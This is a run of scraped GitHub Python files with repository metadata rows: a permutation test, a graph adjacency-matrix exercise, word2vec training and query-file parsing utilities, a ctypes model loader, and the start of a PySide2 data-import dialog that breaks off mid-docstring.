        # Heap-style in-place permutation generator via pairwise swaps.
        global COUNT
        global count2
        if begin>=end:
            # A complete permutation: look for an adjacent repeat.
            # NOTE(review): i starts at 0, so n[0] is also compared with
            # n[-1] (wrap-around adjacency) -- confirm that is intended.
            for i in range(0, end):
                if n[i]==n[i-1]:
                    count2+=1
                    # print(n)
                    break#manage test statistic
            #print (n)
            COUNT +=1
        else:
            i=begin
            for num in range(begin,end):
                n[num],n[i]=n[i],n[num]
                perm(n,begin+1,end)
                n[num],n[i]=n[i],n[num]  # undo the swap (backtrack)
    perm(history, 0, len(history))
    p_value=float(count2)/float(COUNT)
    print('the p value is: ')
    print(p_value)
    return p_value

history=[1,0,0,1]
q1(history)
#perm(n,0,len(n))
#print (COUNT)
#print(count2)
| Ca11me1ce/Funny-Programming | AI-Decision-Making/py_sand/pass_test_q1_1.py | pass_test_q1_1.py | py | 734 | python | en | code | 2 | github-code | 36 |
30569760677 | from typing import List, Tuple
def create_adjacent_list(edges):
    """Build a directed adjacency list {source: [targets, ...]} from (u, v)
    edge pairs, preserving input order and duplicate edges."""
    adjacent_list = dict()
    for source, target in edges:
        # setdefault replaces the original get()-then-branch pair: a single
        # lookup, and no false negative for a falsy key value.
        adjacent_list.setdefault(source, []).append(target)
    return adjacent_list


def solution(n: int, m: int, edges: List[Tuple[int, int]]):
    """Print the n x n adjacency matrix (rows of space-separated 0/1) of a
    directed graph with vertices numbered 1..n, given as an edge list."""
    adjacents_list = create_adjacent_list(edges)
    for i in range(1, n + 1):
        row = [0] * n
        for v in adjacents_list.get(i, ()):
            row[v - 1] = 1
        print(' '.join(map(str, row)))
def input_data():
    """Read the problem input from stdin: first line "n m", then m lines of
    edges "u v". Returns the tuple (n, m, edges)."""
    n, m = map(int, input().strip().split())
    edges = [tuple(map(int, input().strip().split())) for _ in range(m)]
    return n, m, edges
if __name__ == '__main__':
    # Read stdin and print the adjacency matrix.
    solution(*input_data())

# Sample input:
"""
5 3
1 3
2 3
5 2
"""
| fenixguard/yandex_algorithms | sprint_6/B.exchange_edges_list_to_adjacent_list.py | B.exchange_edges_list_to_adjacent_list.py | py | 935 | python | en | code | 2 | github-code | 36 |
31418095220 | from Word2Vec.Word2VecGenerator import Word2VecGenerator
import glob
from JsonParse.JsonParser import JsonParser
import json as Json
class TrainingComponentGenerator:
    """Builds the word2vec training artefacts for the pipeline: a Code2Vec
    model over tokenised source code, an AST2Vec model over AST-node
    sentences, and a JSON dictionary of the distinct AST node labels."""

    # Longest tokenised source-code sentence seen so far.
    __largest_n_words = 0
    # Vector size for the AST-node embedding model.
    __astNode2Vec_size = 0
    # Vector size for the source-code embedding model.
    __number_of_vector_code2vec = 0

    def __init__(self, astNode2Vec_size, number_of_vector_code2vec):
        self.__astNode2Vec_size = astNode2Vec_size
        self.__number_of_vector_code2vec = number_of_vector_code2vec

    def generateTrainingComponent(self, dataFolderPath):
        """Read every JSON commit file matching *dataFolderPath* (a glob
        pattern), collect the sentences, train both word2vec models, and
        write the AST-node dictionary to Outcome/Models/."""
        dataset = []
        for file in glob.glob(dataFolderPath):
            dataset.append(file)
        commits = list()
        parser = JsonParser()
        for data in dataset:
            json = parser.openJson(data)
            commitData = json
            commits.extend(commitData)
        astSentences = list()
        sourceCodeSentences = list()
        astNodeDict = list()
        for commit in commits:
            self.__collectWord2VecData(commit, sourceCodeSentences, astSentences, astNodeDict)
        self.__word2vecModelGenerate(sourceCodeSentences, astSentences)
        # Deduplicate the AST node labels before persisting them.
        astNodeDictSet = set(astNodeDict)  # convert it as set data type.
        astNodeDict = list(astNodeDictSet)
        jsonString = Json.dumps(astNodeDict)
        with open('Outcome/Models/AstNodeDictionary.json', 'w') as f:
            f.write(jsonString)
        print("Training Components are built")

    def __collectWord2VecData(self, commit, sourceCodeSentences, astSentences, astNodeDict):
        """Append the commit's AST-node sentences, tokenised source-code
        sentences, and AST node labels to the given accumulator lists."""
        tasks = commit['tasks']
        commitAstNodeDic = commit['astNodeDic']
        astNodeDict.extend(commitAstNodeDic)
        for task in tasks:
            taskElementTreeSet = task['taskElementTreeSet']
            for taskElement in taskElementTreeSet:
                astNodeSentence = taskElement['astNodeSentence']
                astNodeSenAsList = self.__stringToList(astNodeSentence)
                astSentences.append(astNodeSenAsList)
                sourceCode = taskElement['sourceCode']
                sourceCodeAsList = self.__tokenizedCodes(sourceCode)
                sourceCodeSentences.append(sourceCodeAsList)
                # Track the longest source sentence (see getMaximumNumberOfWord).
                if (self.__largest_n_words < len(sourceCodeAsList)):
                    self.__largest_n_words = len(sourceCodeAsList)

    def __word2vecModelGenerate(self, sourceCodeSentences, astSentences):
        """Train and return the (astNode2Vec, code2Vec) embedding models."""
        # CODE2VEC
        code2Vec = Word2VecGenerator()
        code2Vec.generateModel(sourceCodeSentences, vector_size=self.__number_of_vector_code2vec, window=4, min_count=1,
                               Type='CodeType')
        print("Code2Vec is generated")
        # AST2Vec
        astNode2Vec = Word2VecGenerator()
        astNode2Vec.generateModel(astSentences, vector_size=self.__astNode2Vec_size, window=2, min_count=1,
                                  Type="AstType")
        print("AST2Vec is generated")
        return astNode2Vec, code2Vec

    def __stringToList(self, string):
        """Split a space-separated sentence into a token list."""
        listRes = list(string.split(" "))
        return listRes

    def __tokenizedCodes(self, sourceCode):
        """Tokenise source code by spaces, dropping empty tokens."""
        sourceCodeAsList = self.__stringToList(sourceCode)
        sourceCodeAsList = [x for x in sourceCodeAsList if x != '']
        return sourceCodeAsList

    def getMaximumNumberOfWord(self):
        """Length of the longest tokenised source sentence processed so far."""
        return self.__largest_n_words
| ZzillLongLee/TsGen | TrainingDataGenerator/TrainingComponentGenerator.py | TrainingComponentGenerator.py | py | 3,300 | python | en | code | 0 | github-code | 36 |
36403224897 | from project.Util.EMFAttributes import EMFAttributes
from project.Util.finalWrite import finalWrite
class FileInput:
    """Parses an EMF/MF-query specification file into an EMFAttributes
    object and generates the query-evaluation script from it."""

    filePath = ''

    def readFile(self):
        """Open the (currently hard-coded) query file and return the handle.

        Loops until the open succeeds; the file handle is intentionally left
        open for InputFile() to consume line by line.
        """
        while True:
            path = '/Users/shubhamjain/CS562/project/examples/example5'
            # path += input('Input the File Name with its path\n')
            try:
                file = open(path, "r")
                if file:
                    break
            except (Exception, FileExistsError) as error:
                print("Error while fetching data from file", error)
        return file

    def InputFile(self):
        """Parse the query file section by section (SELECT attributes,
        number of grouping variables, grouping attributes, f-vect, the
        per-variable SELECT conditions, HAVING, WHERE) and return a
        populated EMFAttributes object.

        The file format is positional: each section is announced by a
        keyword line followed by its content line(s).
        """
        print("Input File")
        attr = EMFAttributes()
        file = self.readFile()
        selectAttributes = []
        if file.readline().lower().__contains__('select'):
            selectAttributes =''
            selectAttributes += file.readline()
            selectAttributes = selectAttributes.strip().replace(' ',' ').split(',')
            for idx,selectAtt in enumerate(selectAttributes):
                selectAttributes[idx] = selectAtt.replace(',', '').replace(' ', '')
                # Non-alphabetic attributes must be aggregate names like
                # "sum_quant"; flag anything without an underscore.
                if not selectAttributes[idx].isalpha():
                    selectAttributes[idx] = selectAtt.replace(',','').replace(' ','')
                    if not selectAttributes[idx].__contains__('_'):
                        print("You got trouble in select Attribute", selectAtt)
        n = 0
        if file.readline().lower().__contains__('variable'):
            # Number of grouping variables.
            n = int(file.readline().replace(' ',''))
        groupAttributes = []
        if file.readline().lower().__contains__('attributes'):
            groupAttributes = ''
            groupAttributes += file.readline()
            groupAttributes = groupAttributes.strip().replace(',', ' ').replace(' ', ' ').split(' ')
            for idx, groupAtt in enumerate(groupAttributes):
                if not groupAtt.isalpha():
                    groupAttributes[idx] = groupAtt.replace(',', '').replace(' ', '')
                    if not groupAttributes[idx].__contains__('_'):
                        print("You got trouble in group Attribute", groupAtt)
        # print(groupAttributes)
        f_vect = []
        if file.readline().lower().__contains__('vect'):
            f_vect = ''
            f_vect += file.readline()
            f_vect = f_vect.strip().replace(',', ' ').replace(' ', ' ').split(' ')
            for idx, vect in enumerate(f_vect):
                if not vect.isalpha():
                    f_vect[idx] = vect.replace(',', '').replace(' ', '')
                    if not f_vect[idx].__contains__('_'):
                        print("You got trouble in f-vect Attribute", vect)
        select = []
        if file.readline().lower().__contains__('select'):
            # One line of "and"-joined conditions per grouping variable,
            # terminated by the HAVING keyword line.
            while True:
                conditions = []
                temp = file.readline()[:-1]
                if temp.lower().__contains__('having'):
                    break
                temp = temp.split('and')
                for cons in temp:
                    conditions.append(cons.strip())
                # print(conditions)
                select.append(conditions)
        # print(select)
        having = []
        if temp.lower().__contains__('having'):
            temp = file.readline()
            if not temp.lower().__contains__('where'):
                having = ''
                having += temp
                having = having.split('and')
                having = [val.strip() for val in having]
        # print(having)
        where = ''
        if temp.lower().__contains__('where'):
            where = file.readline().strip()
        attr.emfAttributes(selectAttributes, n, groupAttributes, f_vect, select, having, where)
        # print(attr.f_Vect)
        return attr

    def output(self, attributes, manage):
        """Generate output.py (the query-evaluation script) from the parsed
        *attributes* via finalWrite, returning the output file name.

        NOTE(review): the output handle is never closed/flushed explicitly
        before returning -- confirm callers do not reread it immediately.
        """
        file = open('/Users/shubhamjain/CS562/project/output/output.py', 'w+')
        final_write = finalWrite()
        final_write.setFileName(file.name)
        imports = ['from configparser import RawConfigParser','import psycopg2']
        final_write.setImports(imports)
        final_write.setStructDB(manage.getStructDB())
        final_write.setAttributes(attributes)
        final_write.outputFile(manage)
        for write in final_write.returns:
            file.write(write)
        # print()
        return file.name
#
# fileInput = FileInput()
# fileInput.InputFile()
| itshubhamjain/CS562 | project/src/FileInput.py | FileInput.py | py | 4,399 | python | en | code | 0 | github-code | 36 |
7341734490 | import sys
import os
import ctypes
from ctypes import (
c_double,
c_int,
c_float,
c_char_p,
c_int32,
c_uint32,
c_void_p,
c_bool,
POINTER,
_Pointer, # type: ignore
Structure,
Array,
c_uint8,
c_size_t,
)
import pathlib
from typing import List, Union
# Load the library
def _load_shared_library(lib_base_name: str):
# Construct the paths to the possible shared library names
_base_path = pathlib.Path(__file__).parent.resolve()
# Searching for the library in the current directory under the name "libllama" (default name
# for llamacpp) and "llama" (default name for this repo)
_lib_paths: List[pathlib.Path] = []
# Determine the file extension based on the platform
if sys.platform.startswith("linux"):
_lib_paths += [
_base_path / f"lib{lib_base_name}.so",
]
elif sys.platform == "darwin":
_lib_paths += [
_base_path / f"lib{lib_base_name}.so",
_base_path / f"lib{lib_base_name}.dylib",
]
elif sys.platform == "win32":
_lib_paths += [
_base_path / f"{lib_base_name}.dll",
]
else:
raise RuntimeError("Unsupported platform")
cdll_args = dict() # type: ignore
# Add the library directory to the DLL search path on Windows (if needed)
# Try to load the shared library, handling potential errors
for _lib_path in _lib_paths:
print("_lib_path = ", _lib_path)
if _lib_path.exists():
try:
return ctypes.CDLL(str(_lib_path), **cdll_args)
except Exception as e:
raise RuntimeError(f"Failed to load shared library '{_lib_path}': {e}")
raise FileNotFoundError(
f"Shared library with base name '{lib_base_name}' not found"
)
# Specify the base name of the shared library to load
_lib_base_name = "model"
# Load the library (once, at import time; the wrapper below shares this handle)
_lib = _load_shared_library(_lib_base_name)
# LLAMA_API struct llama_context_params llama_context_default_params();
def inference(argv: c_char_p):
    """Invoke the native ``inference`` entry point; *argv* is the model
    path as ``bytes`` (see the ``__main__`` block below)."""
    return _lib.inference(argv)
#_lib.inference.argtypes = [c_int, c_char_p]
# NOTE(review): argtypes is left unset, so ctypes performs no argument checking.
_lib.inference.restype = c_char_p  # native function returns a C string
if __name__ == "__main__":
    inference(bytes( "stories15M.bin", encoding = 'utf-8'))
| mengbingrock/shepherd | shepherd/llama2c_py/llama2c_py.py | llama2c_py.py | py | 2,276 | python | en | code | 0 | github-code | 36 |
23497341801 | ################ Henri Lahousse ################
# voice assistant
# 05/31/2022
# libraries
import struct
import pyaudio
import pvporcupine # for wakeword
import pvrhino # for situations
# Module-level handles; populated/used inside voice_ass().
porcupine = None
pa = None
audio_stream = None
rhino = None
# documentation picovoice https://picovoice.ai/docs/
# create model wakeword https://console.picovoice.ai/ppn
# create model situation https://console.picovoice.ai/rhn
# NOTE(review): what looks like a real access key is committed in the comment
# below — rotate it and load the key from the environment instead.
access_key = 'ENTER_KEY' # find on picovoice website https://console.picovoice.ai/access_key // my_key 0nevFcYH3LlyYTajYWkG44d+vLWdm5Njxe8tr6xNrj/Kn9/m2qOjeg==
def voice_ass():
    """Blocking voice-assistant loop.

    Listens on the default microphone for the Porcupine wake word while also
    feeding three Rhino speech-to-intent contexts (drive / roof / smart
    lights).  Returns 1 as soon as the wake word is detected.
    """
    porcupine = pvporcupine.create(
        access_key=access_key,
        keyword_paths=['ENTER_PATH'] # download model from website and extract file for wakeword detection // my_path /home/pi/Downloads/wakeword.ppn
    )
    # Helper: build one Rhino speech-to-intent engine from a context file.
    def setup(path):
        rhino = pvrhino.create(
            access_key=access_key,
            context_path=path)
        return rhino
    rhino_drive = setup('ENTER_PATH') # download model from website and extract for situation recognission // /home/pi/Downloads/drive.rhn
    rhino_roof = setup('ENTER_PATH') # = // /home/pi/Downloads/roof.rhn
    rhino_smartlights = setup('ENTER_PATH') # = // /home/pi/Downloads/smartlights.rhn
    pa = pyaudio.PyAudio()
    # Input stream sized for the wake-word engine.
    audio_stream = pa.open(
        rate=porcupine.sample_rate,
        channels=1,
        format=pyaudio.paInt16,
        input=True,
        frames_per_buffer=porcupine.frame_length)
    # Helper: open a separate input stream sized for one Rhino engine.
    def audio(rhino):
        audio_stream_rhn = pa.open(
            rate=rhino.sample_rate,
            channels=1,
            format=pyaudio.paInt16,
            input=True,
            frames_per_buffer=rhino.frame_length)
        return audio_stream_rhn
    audio_sm = audio(rhino_smartlights)
    audio_rf = audio(rhino_roof)
    audio_dr = audio(rhino_drive)
    while True:
        pcm = audio_stream.read(porcupine.frame_length)
        pcm = struct.unpack_from("h" * porcupine.frame_length, pcm)
        keyword_index = porcupine.process(pcm)
        # Helper: feed one audio frame to a Rhino engine; True when an
        # intent inference is ready to be read.
        def fin(aud, rhino):
            rh = aud.read(rhino.frame_length)
            rh = struct.unpack_from("h" * rhino.frame_length, rh)
            is_finalized = rhino.process(rh)
            return is_finalized
        is_fin_sm = fin(audio_sm, rhino_smartlights)
        is_fin_rf = fin(audio_rf, rhino_roof)
        is_fin_dr = fin(audio_dr, rhino_drive)
        # Helper: pull the finished inference (intent + slots) from an engine.
        def rs(is_fin, rhino):
            if is_fin:
                inference = rhino.get_inference() # if if_fin is True we get the inference
                if inference.is_understood: # use intent and slots if it understands
                    intent = inference.intent # intent is a string
                    slots = inference.slots # slots is a dictionary
                    return intent, slots
        # Wake word detected: report it to the caller.
        if keyword_index == 0:
            return 1
        rs(is_fin_sm, rhino_smartlights)
        rs(is_fin_rf, rhino_roof)
        rs(is_fin_dr, rhino_drive)
    # NOTE(review): the two cleanup calls below are unreachable — the
    # `while True` loop above only exits via `return`; also `rhino` here
    # resolves to the module-level None, so `rhino.delete()` would raise.
    porcupine.delete()
    rhino.delete()
| lahousse/ONWARD | software/voice-assistant/voice-assis.py | voice-assis.py | py | 3,324 | python | en | code | 0 | github-code | 36 |
7305309200 | import serial
import serial
from time import sleep
import threading
import time
# sudo chmod 666 /dev/ttyACM0
device_port = "/dev/ttyACM0"
from multiprocessing.pool import ThreadPool
import settings
class uwb_data(threading.Thread):
    """Background thread that reads UWB position fixes from a serial port
    and publishes the latest (x, y) pair via ``settings.myList``."""
    def __init__(self,file_name,device_port):
        threading.Thread.__init__(self)
        self.file_name = file_name  # CSV path used by create_csv_file()
        self.serial = serial.Serial(device_port)  # opens the port immediately
        self.running = True  # cleared by terminate() to stop run()
        self.myval = []  # latest [x, y] fix (ints); empty before first fix
    def create_csv_file(self):
        """Create the CSV log file and write its header row."""
        # NOTE(review): the handle is kept open on self.f and never closed.
        self.f = open(self.file_name, 'w+')
        self.f.write("timestamp,x,y,z \n")
        sleep(1)
    def store_uwb_data(self):
        """Read one line from the device and cache the x/y position."""
        val = str(self.serial.readline().decode().strip(' \r\n'))
        if val.startswith('+DPOS:'):
            # NOTE(review): str.strip() removes a *character set*, not a
            # prefix; it happens to work here given the '+DPOS:' guard above.
            val = val.strip('+DPOS:')
            val = val.split(',')
            # Fields 2 and 3 are assumed to be x and y — TODO confirm
            # against the device protocol.
            self.myval = [int(float(val[2])),int(float(val[3]))]
    def get_uwb_data(self):
        """Return the most recent [x, y] fix (empty list before first fix)."""
        return self.myval
    def run(self):
        # Poll the serial port until terminate() clears the flag.
        while self.running:
            self.store_uwb_data()
            settings.myList = self.get_uwb_data()
    def terminate(self):
        """clean stop"""
        self.running = False
if __name__ == "__main__":
    # Demo: stream fixes from the tag on /dev/ttyACM0 and print them until
    # interrupted with Ctrl-C.
    uwb_get_way = uwb_data('IDRdata.csv',"/dev/ttyACM0")
    uwb_get_way.start()
    pool = ThreadPool(processes=1)
    try:
        while True:
            # NOTE(review): the thread-pool round-trip is redundant —
            # get_uwb_data() is cheap and could be called directly.
            async_result = pool.apply_async(uwb_get_way.get_uwb_data)
            return_val = async_result.get()
            print(settings.myList)
    except (KeyboardInterrupt, SystemExit):
        uwb_get_way.terminate()
        print("killed")
43914377308 | # 도시 분할 계획
import sys
input = sys.stdin.readline
def find_parent(parent, x):
    """Return the root of x's set, compressing the path along the way.

    Iterative rewrite: the original recursive version can hit Python's
    default recursion limit on long parent chains (no sys.setrecursionlimit
    is raised in this script); the final parent-table state is identical.
    """
    # First pass: walk up to the root.
    root = x
    while parent[root] != root:
        root = parent[root]
    # Second pass: point every node on the walk directly at the root.
    while parent[x] != root:
        parent[x], x = root, parent[x]
    return root
def union_parent(parent, a, b):
    """Merge the sets containing a and b.

    The root with the smaller index becomes the parent of the other, so a
    set's representative is always its smallest root seen so far.
    """
    root_a = find_parent(parent, a)
    root_b = find_parent(parent, b)
    if root_a < root_b:
        parent[root_b] = root_a
    else:
        parent[root_a] = root_b
# Input and initialisation
num_node, num_edge = map(int, input().split())
parent_table = [0] * (num_node+ 1) # union-find parent table
edges = [] # edge list
result_edges = [] # costs of the edges kept in the spanning tree
# Every node starts as its own set representative.
for i in range(1, num_node + 1):
    parent_table[i] = i
for _ in range(num_edge):
    a, b, cost = map(int, input().split())
    edges.append((cost, a, b))
# Sort edges by ascending cost
edges.sort()
# Kruskal's algorithm
for edge in edges:
    cost, a, b = edge
    # Only take the edge if it does not create a cycle
    if find_parent(parent_table, a) != find_parent(parent_table, b):
        union_parent(parent_table, a, b)
        # Selected as a spanning-tree edge (counted in the total cost)
        result_edges.append(cost)
# To split the villages into two groups at minimum maintenance cost, drop the
# single most expensive edge of the MST before summing.
print(sum(result_edges) - max(result_edges))
24547009552 | #!/usr/bin/python3
"""
function that prints a text with 2 new lines after each of\
these characters: ., ? and :
"""
def text_indentation(text):
    """Print *text*, inserting two newlines after each '.', '?' or ':'.

    A single space immediately following one of those characters is
    swallowed (so the next sentence starts flush left); any additional
    spaces are printed as-is.

    Args:
        text (str): the text to print.

    Raises:
        TypeError: if text is not a string.
    """
    # Fix: use isinstance instead of `type(text) is not str`, and compare
    # characters with `==`/`in` instead of `is` — identity comparison of
    # string literals only works by accident of CPython interning and is a
    # SyntaxWarning on modern Python.
    if not isinstance(text, str):
        raise TypeError("text must be a string")
    skip_space = False
    for ch in text:
        # Swallow exactly one space right after a punctuation mark.
        if skip_space and ch == ' ':
            skip_space = False
            continue
        if ch in '.?:':
            print("{}\n".format(ch))
            skip_space = True
        else:
            print(ch, end='')
            skip_space = False
| adebudev/holbertonschool-higher_level_programming | 0x07-python-test_driven_development/5-text_indentation.py | 5-text_indentation.py | py | 821 | python | en | code | 0 | github-code | 36 |
9399875003 | # To add a new cell, type '#%%'
# To add a new markdown cell, type '#%% [markdown]'
#%% [markdown]
#
# # HW06
# ## By: xxx
# ### Date: xxxxxxx
#
#%% [markdown]
# Let us improve our Stock exercise and grade conversion exercise with Pandas now.
#
#%%
import dm6103 as dm
import os
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
#%%
# Load the data frame from api
dfaapl = dm.api_dsLand('AAPL_daily', 'date')
print("\nReady to continue.")
# Structural check of the frame via the course helper library.
dm.dfChk(dfaapl)
# What are the variables in the df?
# What are the data types for these variables?
#%%
# You can access pd dataframe columns using the dot notation as well as using column names
print(dfaapl.price, '\n')
# same as
print(dfaapl['price'])
#%%
# Step 1
# Create the Stock class
#
class Stock:
    """
    Stock class of a publicly traded stock on a major market
    """
    # NOTE(review): imports placed in a class body become class attributes
    # (Stock.dm, Stock.pd, ...); they work, but module-level imports are the
    # conventional place for these.
    import dm6103 as dm
    import os
    import numpy as np
    import pandas as pd
    def __init__(self, symbol, name, init_tbname) :
        """
        :param symbol: stock symbol
        :param name: company name
        :param init_tbname: the initial table name on our DSLand API with historical data. Date is index, with eod price and vol as columns.
        """
        # note that the complete list of properties/attributes below has more items than
        # the number of arguments of the constructor. That's perfectly fine.
        # Some property values are to be assigned later after instantiation.
        self.symbol = symbol.upper()
        self.name = name
        self.data = self.import_history(init_tbname) # this is a pandas df, make sure import_history() returns a pd dataframe
        # the pandas df self.data will have columns price, volume, delta1, delta2, and index is date
        self.init_delta1() # Calculate the daily change values from stock price itself, append to df
        self.init_delta2() # Calculate the daily values second derivative, append to df
        self.firstdate = self.data.index[-1]
        self.lastdate = self.data.index[0]
    def import_history(self, tbname):
        """
        import stock history from api_dsLand, with columns date, eod_price, volume
        """
        return dm.api_dsLand( tbname, 'date' ) # use date as index
    def init_delta1(self):
        """
        compute the daily change from price_eod, append to data as new column as delta1
        """
        # notice that:
        # aapl['price'] returns a pandas series
        # aapl[['price']] returns a pandas dataframe
        # aapl['price'].values returns a numpy array of the values only
        self.data['delta1'] = 0 # initialize a new column with 0s
        self.data['delta1'] = self.data['price'][0:-1] - self.data.price.values[1:] # self.data['price'] is the same as self.data.price
        # the first term on the right is the full pd series with index attached. Second one is a simple numpy array without the date
        # index. That way, the broadcasting will not try to match the indices/indexes on the two df
        return # you can choose to return self
    def init_delta2(self):
        """
        compute the daily change for the entire list of delta1, essentially the second derivatives for price_eod
        """
        # essentially the same function as init_delta1.
        self.data['delta2'] = 0 # initialize a new column with 0s
        self.data['delta2'] = self.data.delta1[0:-1] - self.data.delta1.values[1:] # same series-minus-array trick as init_delta1
        return # you can choose to return self
    def add_newday(self, newdate, newprice, newvolume):
        """
        add a new data point at the beginning of data df
        """
        # Make plans
        # insert a new row to self.data with
        # (date, price, volume, delta1, delta2) to the pandas df,
        # and also should update self.lastdate
        #
        # update self.lastdate
        self.lastdate = newdate
        # get ready a new row, in the form of a pandas dataframe.
        # Pandas dataframe does not have an insert function. The usual method is to use .append()
        # and .append() is most efficient to append a df to another df of the same columns.
        # NOTE(review): DataFrame.append was deprecated in pandas 1.4 and
        # removed in 2.0 — use pd.concat([newRow, self.data]) when upgrading.
        newRow = self.setNewRow(newdate, newprice, newvolume) # we do this quite a lot: assume it's done already, then implement it later.
        # need this function setNewRow() to return a dataframe
        self.data = newRow.append(self.data) # this will put the new row on top, and push self.data after the new data
        return self
    def setNewRow(self, newdate, newprice, newvolume):
        """Build a 1-row dataframe (indexed by newdate) for the new data point."""
        # first create a copy of the dataframe with a dummy first row
        # the correct newdate is set as the index value for this 1-row dataframe
        df = pd.DataFrame( dict( {'date': [ newdate ]}, **{ key: [0] for key in self.data.columns } ) )
        df.set_index( 'date', inplace=True )
        # df.index = [ newdate ] # this is already set properly above.
        # NOTE(review): the chained assignments below (df.price[0] = ...)
        # trigger SettingWithCopyWarning on newer pandas; df.loc/iloc is the
        # recommended form.
        df.price[0] = newprice
        df.volume[0] = newvolume
        df.delta1[0] = newprice - self.data.price[0]
        df.delta2[0] = df.delta1[0] - self.data.delta1[0]
        return df
    def nday_change_percent(self,n):
        """
        calculate the percentage change in the last n days, returning a (possibly negative) percentage
        """
        change = self.data.price[0]-self.data.price[n]
        percent = 100*change/self.data.price[n]
        print(self.symbol,": Percent change in",n,"days is {0:.2f}".format(percent))
        return percent
    def nday_max_price(self,n):
        """
        find the highest price within the last n days
        """
        return self.data.price[0:n].max()
    def nday_min_price(self,n):
        """
        find the lowest price within the last n days
        """
        return self.data.price[0:n].min()
#%%
# Try these:
# Exercise the Stock class against the AAPL daily table.
filename = 'AAPL_daily'
aapl = Stock('AAPL','Apple Inc',filename)
aapl.data.head()
aapl.data.tail()
aapl.nday_max_price(333) # record the answer here
aapl.nday_min_price(500) # record the answer here
aapl.nday_change_percent(500) # record the answer here
aapl.add_newday('9/13/19',218.42,12345678)
aapl.data.head()
# %%
| rajkumarcm/Data-Mining | Assignments/HW_Pandas/HW_pandas_stock_solution.py | HW_pandas_stock_solution.py | py | 5,856 | python | en | code | 0 | github-code | 36 |
17883995055 | # -*- encoding: utf-8 -*-
import logging
import os
import time
import numpy as np
import openpyxl
import pandas as pd
import xlrd
# 导入PyQt5模块
from PySide2.QtCore import *
from PySide2.QtWidgets import *
from dataImportModel import Ui_Form as dataImportFormEngine
from widgets import kwargs_to_str
from lib.comm import set_var, run_command
# 导入matlab加载模块
# Module-level logger (one per module, per logging convention)
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
class ImportDialog(QDialog):
    """Base dialog for all data-import windows (text/CSV/Excel/database).

    Subclasses override the four stub hooks below; this base class holds the
    shared state (``import_param`` / ``import_message``), the preview table
    plumbing, and the logic that pushes the imported pandas data into the
    host application's workspace.
    """
    # Custom signal used to pass the imported file path/data back to the host.
    signal_data_change = Signal(str, dict, str, str, str, str, str)
    extension_lib = None  # injected by the host; provides Data/Program services
    def __init__(self, parent=None):
        super(ImportDialog, self).__init__(parent)
        self.current_dataset: pd.DataFrame = None
        self.import_message = {"isError": False, "warningMessage": []}
        self.separator_char = [",", ";", "\\s", "\\t"]
        self.encode_type = ["utf8", "gb2312", "gbk", "ascii"]
    def importDatasetPreview(self):
        """Hook: preview the dataset (overridden by subclasses)."""
        pass
    def getImportParam(self):
        """Hook: collect the panel configuration (overridden by subclasses)."""
        pass
    def importDatasetReload(self):
        """Hook: (re)load the data from its source (overridden by subclasses)."""
        pass
    def updateTableView(self):
        """Hook: refresh the preview table (overridden by subclasses)."""
        pass
    def open_file(self, path: str):
        """Programmatic entry point: open *path* directly and preview it."""
        assert os.path.exists(path)
        self.lineEdit_filePath.setText(path)
        self.previewButton()
    def openfile(self):
        """
        Choose a file.  Two entry points must be supported:
        (1) clicking the "Browse" button
        (2) clicking the "Preview" button
        """
        path = self.lineEdit_filePath.text()
        self.import_param.update(choosefile=False)
        if not path:
            # No path yet — pop a file-open dialog for the user.
            path, openfile_type = QFileDialog.getOpenFileName(self, '选择文件', self.get_work_dir(),
                                                              "文件类型({})".format(self.file_types))
            self.lineEdit_filePath.setText(path)
        if path:
            # A file was chosen: derive the dataset name from the file stem.
            temp_name = (os.path.split(self.lineEdit_filePath.text())[1]).split(".")[0:-1]
            # Use the file stem as the import variable name; fall back to
            # "temp" when the stem is empty.
            dataset_name = "temp" if temp_name == [""] else ".".join(temp_name)
            self.lineEdit_datasetName.setText(dataset_name)
        else:
            # Dialog cancelled: restore the previously recorded path.
            self.lineEdit_filePath.setText(self.import_param["filepath"])
    def chooseFileButton(self):
        """Handler for the "browse file" button."""
        self.lineEdit_filePath.setText("")
        self.previewButton()
    def previewButton(self):
        """Handler for the "preview" button."""
        self.import_param.update(ispreview=True)
        self.openfile()
        self.getImportParam()
        if self.import_message["isError"]:
            self.showWarningMessage()
        else:
            if self.lineEdit_filePath.text():
                self.importDatasetLoad()
                self.updateTableView()
    def importDatasetButton(self):
        """Validate the data before sending it to the workspace."""
        self.import_param.update(ispreview=False)
        self.getImportParam()
        if self.import_message["isError"]:
            self.showWarningMessage()
            return
        # if self.import_param["filepath"] == "" or len(self.current_dataset) == 0:
        if len(self.current_dataset) == 0:
            self.showWarningMessage(info="导入失败!\n提示:请提供正确数据集")
            return
        var_name_check = self.updateDatasetVarname()
        if var_name_check:
            import sys
            t0 = time.time()
            self.importDatasetLoad()
            self.sendDataset()
            t1 = time.time()
            # Log elapsed time and (shallow) size of the imported dataset.
            logger.info("导入数据集所用时间: {t} s 大小 {m} MB".format(
                t=round(t1 - t0, 2), m=round(sys.getsizeof(self.current_dataset) / 1024, 2)
            ))
            self.current_dataset = None
    def importDatasetLoad(self):
        """Load the data and run validity checks; returns an error string ('' on success)."""
        error = ""
        self.import_param.update(status=False)
        try:
            self.importDatasetReload()
            self.import_param.update(status=True)
        except UnicodeDecodeError as e:
            # The chosen encoding could not decode the file.
            encodetype = self.import_param["param"]["encoding"]
            self.updateWarningMessage(info="指定的编码方式“{}”无法解码要打开的文件,请尝试其他编码方式".format(encodetype))
            error = str(e)
        except MemoryError as e:
            # File too large for the available memory.
            self.updateWarningMessage(info="文件过大,超过内存上限,导入失败!")
            error = str(e)
        except Exception as e:
            self.updateWarningMessage(info="导入失败,错误详情:\n{}".format(str(e)))
            error = str(e)
        if self.import_message["isError"]:
            self.showWarningMessage()
        return (error)
    def getDatasetInfo(self, varname=""):
        """
        Record each loaded variable's name and data structure.
        Preserving a user-reconfigured per-column dtype scheme is not yet supported.
        varname = unified name applied to every variable (optional)
        """
        self.import_param.update(varname={}, dtypes={})
        for k in self.current_dataset:
            self.import_param["varname"][k] = varname if varname else k
            if type(self.current_dataset[k]) == pd.DataFrame:
                self.import_param["dtypes"][k] = self.current_dataset[k].dtypes
            else:
                self.import_param["dtypes"][k] = type(self.current_dataset[k])
    def updateDatasetVarname(self):
        """
        Ask the user for the workspace variable name of the imported dataset.

        TODO: renaming scenarios to consider in the future:
        (1) renaming after import —
            [1] one file / one variable (single sheet) import
            [2] one file / multiple variables (sheets): import as one dict,
                as several variables, or merged into one variable when the
                structures match
        (2) which data structure to import as (dataframe, dict, str, list, ...)
        (3) adjusting the data structure at import time
